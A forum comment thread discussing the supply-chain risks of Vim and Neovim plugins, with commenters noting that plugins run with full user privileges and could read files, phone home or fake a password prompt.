I’m curious. What’s the risk of a supply chain attack? What are the privileges of a VIM plugin?

A plugin can spawn arbitrary processes so if neovim is not started in a sandbox (container, namespace, firejail...) they can basically do whatever your user has the right to do.

Pretty big supply chain risks here.

	▲	WhyNotHugo 5 days ago \| parent [-]
		And often times sandboxing it is hard. E.g.: what do you use to edit ~/.ssh/config or ~/.profile?

▲

asimovDev 5 days ago | parent | prev | next [-]

neovim (vim) plugins can make web requests, so you could steal secrets from a .env file being edited by, for example, making a LSP plugin active for .env files? According to my limited knowledge of LSP and how neovim plugins work, it should be possible

Could also just phone home everything a user edits using the text editor I bet.

Can someone tell me, when someone has a terminal buffer, using a vim plugin, could you potentially steal their root password when a user runs a sudo command?

And following up, could you, using that password, allow SSH connections and open ports in other system config files? Disable firewall? And potentially execute other commands using `:!` ?

	▲	63stack 4 days ago \| parent [-]
		You have the entire Lua language available in vim plugins, so you can just read all the files on the disk that the user has access to, you don't need to make an lsp plugin. Executing shell commands is also possible, yes. Reading the root password is not possible because that's handled by an external program (forgot the specifics on Linux), but you could technically present a fake password prompt, and steal that.

▲

kzrdude 5 days ago | parent | prev [-]

Anything a user application can do